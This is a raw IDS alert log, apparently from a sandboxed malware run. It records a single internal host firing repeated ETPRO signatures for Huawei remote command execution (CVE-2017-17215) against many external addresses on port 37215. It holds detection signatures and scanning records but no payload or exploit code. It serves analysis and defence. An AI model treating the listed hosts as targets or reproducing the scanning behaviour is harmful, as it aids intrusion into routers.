                                                    07/10/24-08:26:51.924375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5603237215192.168.2.14157.182.200.77
                                                    07/10/24-08:27:24.920264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392037215192.168.2.14157.44.61.124
                                                    07/10/24-08:26:17.961786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3929037215192.168.2.14157.8.228.166
                                                    07/10/24-08:26:26.594914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967037215192.168.2.1441.80.2.68
                                                    07/10/24-08:27:19.259031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006437215192.168.2.1441.124.14.251
                                                    07/10/24-08:27:05.237308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961437215192.168.2.14157.74.228.179
                                                    07/10/24-08:27:19.336924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020237215192.168.2.14170.187.186.153
                                                    07/10/24-08:26:49.859169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863237215192.168.2.14197.51.89.208
                                                    07/10/24-08:27:24.894621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981837215192.168.2.1441.71.47.165
                                                    07/10/24-08:27:17.043908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924637215192.168.2.14157.86.101.177
                                                    07/10/24-08:27:23.969941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772437215192.168.2.14196.116.92.93
                                                    07/10/24-08:26:13.767213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554437215192.168.2.14199.60.70.205
                                                    07/10/24-08:26:38.563022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644237215192.168.2.14157.13.186.253
                                                    07/10/24-08:27:08.398717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249237215192.168.2.14139.148.66.241
                                                    07/10/24-08:26:59.639186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623837215192.168.2.14157.234.3.205
                                                    07/10/24-08:26:29.873958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4696837215192.168.2.1441.104.0.249
                                                    07/10/24-08:26:31.072939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064637215192.168.2.14197.27.233.228
                                                    07/10/24-08:26:28.774897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3684837215192.168.2.1441.237.125.74
                                                    07/10/24-08:26:55.385980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631637215192.168.2.14197.215.230.68
                                                    07/10/24-08:26:34.230716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389637215192.168.2.1441.183.216.2
                                                    07/10/24-08:26:43.706430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348437215192.168.2.14162.218.117.227
                                                    07/10/24-08:27:05.164173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465637215192.168.2.1441.33.132.122
                                                    07/10/24-08:27:08.385644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864437215192.168.2.14197.113.207.152
                                                    07/10/24-08:26:14.755874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940837215192.168.2.1441.53.208.133
                                                    07/10/24-08:26:52.086105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845837215192.168.2.14208.172.123.107
                                                    07/10/24-08:27:31.468690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319837215192.168.2.1441.180.202.147
                                                    07/10/24-08:26:47.933243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729637215192.168.2.14157.244.142.185
                                                    07/10/24-08:26:15.880564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831637215192.168.2.14157.114.88.13
                                                    07/10/24-08:27:13.905026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4498637215192.168.2.14197.46.68.235
                                                    07/10/24-08:26:33.243184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625037215192.168.2.14197.74.226.56
                                                    07/10/24-08:27:30.456446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819437215192.168.2.14167.16.194.137
                                                    07/10/24-08:26:59.807030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4388637215192.168.2.1482.97.38.225
                                                    07/10/24-08:26:29.868554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3632037215192.168.2.14157.127.65.218
                                                    07/10/24-08:27:22.548676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899637215192.168.2.14197.254.91.135
                                                    07/10/24-08:26:45.607530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3279437215192.168.2.1441.237.124.219
                                                    07/10/24-08:27:22.835700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191837215192.168.2.14197.105.98.3
                                                    07/10/24-08:27:10.679759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5119637215192.168.2.14197.187.106.157
                                                    07/10/24-08:26:49.755062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330437215192.168.2.14197.180.37.168
                                                    07/10/24-08:26:14.809601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364237215192.168.2.14197.184.186.128
                                                    07/10/24-08:27:10.663912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080837215192.168.2.14197.38.248.15
                                                    07/10/24-08:27:23.915755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585837215192.168.2.14157.211.25.61
                                                    07/10/24-08:27:30.544401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869037215192.168.2.1441.199.126.152
                                                    07/10/24-08:26:55.319279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964237215192.168.2.14157.154.223.160
                                                    07/10/24-08:26:28.746677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4095037215192.168.2.1441.244.26.64
                                                    07/10/24-08:26:53.209025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587837215192.168.2.14174.146.46.247
                                                    07/10/24-08:26:29.890677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004237215192.168.2.14156.138.204.176
                                                    07/10/24-08:26:45.645798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805437215192.168.2.1483.58.75.253
                                                    07/10/24-08:26:17.956577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5161237215192.168.2.14197.0.81.243
                                                    07/10/24-08:26:22.278406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128837215192.168.2.14197.63.161.33
                                                    07/10/24-08:27:23.849464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5661037215192.168.2.14157.171.181.45
                                                    07/10/24-08:26:48.008673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814837215192.168.2.14197.22.74.219
                                                    07/10/24-08:27:31.457680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858437215192.168.2.14194.135.200.124
                                                    07/10/24-08:26:57.610016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4014437215192.168.2.14157.36.50.133
                                                    07/10/24-08:27:08.353960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5587637215192.168.2.1425.58.41.92
                                                    07/10/24-08:26:29.877768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128037215192.168.2.1441.201.22.63
                                                    07/10/24-08:26:49.832032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3385037215192.168.2.149.99.118.92
                                                    07/10/24-08:27:05.155297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085037215192.168.2.14157.48.4.206
                                                    07/10/24-08:26:42.161907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885637215192.168.2.14157.33.58.106
                                                    07/10/24-08:26:14.821696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5843237215192.168.2.14157.220.23.42
                                                    07/10/24-08:27:19.271475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827237215192.168.2.14197.249.27.5
                                                    07/10/24-08:26:41.350291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5750837215192.168.2.1441.212.43.127
                                                    07/10/24-08:27:22.835160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520637215192.168.2.14197.72.156.205
                                                    07/10/24-08:27:07.259693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363037215192.168.2.14197.156.170.43
                                                    07/10/24-08:26:28.882577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3642637215192.168.2.1441.174.98.220
                                                    07/10/24-08:26:41.583277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524437215192.168.2.14197.115.91.150
                                                    07/10/24-08:26:59.882583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5512437215192.168.2.14197.236.54.153
                                                    07/10/24-08:26:53.163403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852437215192.168.2.14157.160.106.26
                                                    07/10/24-08:26:41.602789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5855237215192.168.2.1441.121.58.203
                                                    07/10/24-08:27:03.035788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4818637215192.168.2.1441.66.38.161
                                                    07/10/24-08:27:08.380620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377237215192.168.2.1441.208.177.115
                                                    07/10/24-08:27:19.151006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4880237215192.168.2.1452.207.58.94
                                                    07/10/24-08:26:59.771211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753037215192.168.2.14157.53.39.174
                                                    07/10/24-08:27:17.025929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3903037215192.168.2.14157.202.97.142
                                                    07/10/24-08:27:19.157355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3724837215192.168.2.1457.147.240.165
                                                    07/10/24-08:26:49.854683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5670037215192.168.2.14197.196.109.27
                                                    07/10/24-08:26:47.869389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109837215192.168.2.1441.28.146.194
                                                    07/10/24-08:27:13.915604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581437215192.168.2.14197.18.157.74
                                                    07/10/24-08:27:17.037647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5718237215192.168.2.1441.239.210.45
                                                    07/10/24-08:26:14.625044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4744437215192.168.2.1453.40.112.156
                                                    07/10/24-08:26:41.510075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090637215192.168.2.14157.72.108.133
                                                    07/10/24-08:26:36.435588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892037215192.168.2.1441.22.158.171
                                                    07/10/24-08:26:47.783932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5337837215192.168.2.1441.185.134.168
                                                    07/10/24-08:26:41.369848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470837215192.168.2.14113.30.86.25
                                                    07/10/24-08:26:23.348136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4057637215192.168.2.14115.141.18.161
                                                    07/10/24-08:26:31.085026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335837215192.168.2.1441.82.97.113
                                                    07/10/24-08:27:22.900850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639837215192.168.2.14197.18.125.214
                                                    07/10/24-08:27:23.863444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285237215192.168.2.14157.72.30.170
                                                    07/10/24-08:26:41.609298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581237215192.168.2.14197.240.2.164
                                                    07/10/24-08:26:26.583473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4166637215192.168.2.14157.180.150.127
                                                    07/10/24-08:26:59.826024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415637215192.168.2.1441.145.3.46
                                                    07/10/24-08:26:33.255405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901837215192.168.2.14197.127.209.123
                                                    07/10/24-08:27:13.822075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987237215192.168.2.1441.27.25.129
                                                    07/10/24-08:27:30.521330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5491637215192.168.2.14167.136.173.220
                                                    07/10/24-08:27:22.483673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105437215192.168.2.14157.67.183.57
                                                    07/10/24-08:27:32.580487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148237215192.168.2.14157.180.246.85
                                                    07/10/24-08:26:59.865437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342037215192.168.2.14134.106.24.212
                                                    07/10/24-08:27:24.951941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234637215192.168.2.14157.8.224.88
                                                    07/10/24-08:26:26.597424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695437215192.168.2.14157.132.125.24
                                                    07/10/24-08:26:11.550470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4744837215192.168.2.1477.76.169.184
                                                    07/10/24-08:26:11.562069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5674237215192.168.2.14157.123.65.148
                                                    07/10/24-08:26:28.758809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4301637215192.168.2.1457.139.180.199
                                                    07/10/24-08:26:47.949660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025237215192.168.2.14115.219.4.26
                                                    07/10/24-08:26:15.813714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507837215192.168.2.14157.18.177.200
                                                    07/10/24-08:26:28.819070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596637215192.168.2.14197.206.206.116
                                                    07/10/24-08:26:14.791057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840637215192.168.2.14220.24.58.183
                                                    07/10/24-08:26:15.793642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644837215192.168.2.14197.55.10.55
                                                    07/10/24-08:26:28.891861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5031837215192.168.2.14157.116.169.3
                                                    07/10/24-08:27:23.914587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297637215192.168.2.14157.90.13.196
                                                    07/10/24-08:26:28.798485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957637215192.168.2.14157.58.59.176
                                                    07/10/24-08:27:27.133887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304037215192.168.2.1492.88.158.225
                                                    07/10/24-08:27:30.466887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959437215192.168.2.1441.57.55.33
                                                    07/10/24-08:27:02.841622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886037215192.168.2.1424.31.69.199
                                                    07/10/24-08:26:14.828037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815037215192.168.2.14182.177.88.28
                                                    07/10/24-08:26:49.837890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510837215192.168.2.1441.174.118.166
                                                    07/10/24-08:26:23.336235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5151637215192.168.2.14118.230.64.50
                                                    07/10/24-08:26:26.527286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565837215192.168.2.1435.150.194.19
                                                    07/10/24-08:26:22.285937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3519637215192.168.2.14205.185.108.151
                                                    07/10/24-08:26:59.539411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486037215192.168.2.14107.9.198.124
                                                    07/10/24-08:27:19.279611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831037215192.168.2.14125.29.154.10
                                                    07/10/24-08:26:18.011354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507437215192.168.2.14157.79.253.46
                                                    07/10/24-08:26:25.432344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428037215192.168.2.14197.80.188.26
                                                    07/10/24-08:27:11.489272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053037215192.168.2.14157.141.67.176
                                                    07/10/24-08:27:02.876931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641837215192.168.2.1441.109.113.4
                                                    07/10/24-08:26:43.849597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681837215192.168.2.14197.29.253.94
                                                    07/10/24-08:26:49.801856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234437215192.168.2.14220.122.85.125
                                                    07/10/24-08:26:53.190112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219037215192.168.2.14157.148.22.132
                                                    07/10/24-08:27:02.702659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056037215192.168.2.14197.107.29.117
                                                    07/10/24-08:26:38.637224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931837215192.168.2.1441.100.142.177
                                                    07/10/24-08:26:22.278406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4072237215192.168.2.1441.53.9.90
                                                    07/10/24-08:26:34.244289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4548237215192.168.2.14157.17.181.191
                                                    07/10/24-08:26:38.565091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717837215192.168.2.14197.121.235.84
                                                    07/10/24-08:27:13.998710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148037215192.168.2.14197.148.80.235
                                                    07/10/24-08:26:15.811251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046437215192.168.2.14197.215.90.211
                                                    07/10/24-08:26:25.525521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590437215192.168.2.14157.98.21.160
                                                    07/10/24-08:27:23.923569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443037215192.168.2.14113.224.7.123
                                                    07/10/24-08:26:14.781247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000437215192.168.2.14157.112.111.11
                                                    07/10/24-08:26:22.214237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011437215192.168.2.1441.108.36.228
                                                    07/10/24-08:27:02.683059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477837215192.168.2.14220.148.128.122
                                                    07/10/24-08:27:13.714524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047437215192.168.2.14197.239.117.12
                                                    07/10/24-08:26:42.366106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045637215192.168.2.14157.68.194.125
                                                    07/10/24-08:26:57.650241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931637215192.168.2.1441.69.184.97
                                                    07/10/24-08:27:19.290151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5366437215192.168.2.14157.215.153.102
                                                    07/10/24-08:26:38.518951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964037215192.168.2.14194.65.3.250
                                                    07/10/24-08:26:41.496720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593437215192.168.2.14157.248.231.11
                                                    07/10/24-08:27:05.164451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660837215192.168.2.14157.26.4.209
                                                    07/10/24-08:27:17.034807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267237215192.168.2.14157.205.171.205
                                                    07/10/24-08:27:10.576440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411637215192.168.2.14197.34.155.238
                                                    07/10/24-08:26:49.816835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812637215192.168.2.14197.232.28.83
                                                    07/10/24-08:26:28.896457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874837215192.168.2.14197.244.24.64
                                                    07/10/24-08:26:52.043481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346437215192.168.2.1441.162.208.251
                                                    07/10/24-08:27:10.612080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5138637215192.168.2.14157.84.147.114
                                                    07/10/24-08:26:43.902594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716437215192.168.2.14154.235.244.3
                                                    07/10/24-08:26:48.000164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055637215192.168.2.14157.221.189.1
                                                    07/10/24-08:27:31.489680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430037215192.168.2.14197.86.68.81
                                                    07/10/24-08:27:33.948431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921037215192.168.2.14145.7.118.122
                                                    07/10/24-08:26:14.815685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809837215192.168.2.14197.175.137.135
                                                    07/10/24-08:27:14.672861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805437215192.168.2.1441.191.178.248
                                                    07/10/24-08:26:25.523012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4807237215192.168.2.14197.8.235.127
                                                    07/10/24-08:27:03.003897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156037215192.168.2.1441.53.94.112
                                                    07/10/24-08:26:25.473474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717037215192.168.2.14197.44.157.83
                                                    07/10/24-08:27:14.793523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146237215192.168.2.14222.134.143.180
                                                    07/10/24-08:26:13.785071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928237215192.168.2.14197.111.106.252
                                                    07/10/24-08:26:38.625504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5029437215192.168.2.1441.230.127.35
                                                    07/10/24-08:27:17.084652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475837215192.168.2.14197.28.29.248
                                                    07/10/24-08:26:36.349242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5215037215192.168.2.14157.82.196.230
                                                    07/10/24-08:26:20.160921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4516837215192.168.2.14157.220.213.68
                                                    07/10/24-08:26:15.871447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828837215192.168.2.14197.95.172.111
                                                    07/10/24-08:26:33.207686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304037215192.168.2.14197.160.173.101
                                                    07/10/24-08:27:28.101557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727237215192.168.2.14197.183.140.37
                                                    07/10/24-08:26:22.231914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438437215192.168.2.1441.96.135.42
                                                    07/10/24-08:26:23.344718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679437215192.168.2.1441.185.199.211
                                                    07/10/24-08:27:10.613863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3765437215192.168.2.1441.225.2.219
                                                    07/10/24-08:27:10.632991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325237215192.168.2.14157.171.214.197
                                                    07/10/24-08:26:20.191399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5661237215192.168.2.1441.29.15.155
                                                    07/10/24-08:26:17.963816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542437215192.168.2.14157.175.24.80
                                                    07/10/24-08:26:59.665710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441837215192.168.2.1441.87.43.110
                                                    07/10/24-08:26:18.024075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849437215192.168.2.14197.141.11.75
                                                    07/10/24-08:26:15.831923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035237215192.168.2.142.129.11.218
                                                    07/10/24-08:26:57.515772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042437215192.168.2.14141.32.201.207
                                                    07/10/24-08:27:20.465433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363237215192.168.2.14197.62.68.82
                                                    07/10/24-08:26:25.479456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5988237215192.168.2.14197.60.232.61
                                                    07/10/24-08:26:57.593962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304437215192.168.2.14179.81.193.190
                                                    07/10/24-08:26:13.787067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5107037215192.168.2.14223.169.203.255
                                                    07/10/24-08:26:36.411505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5226637215192.168.2.14145.174.146.149
                                                    07/10/24-08:26:49.821091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3791637215192.168.2.1414.131.254.97
                                                    07/10/24-08:26:55.437797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247837215192.168.2.14197.203.103.99
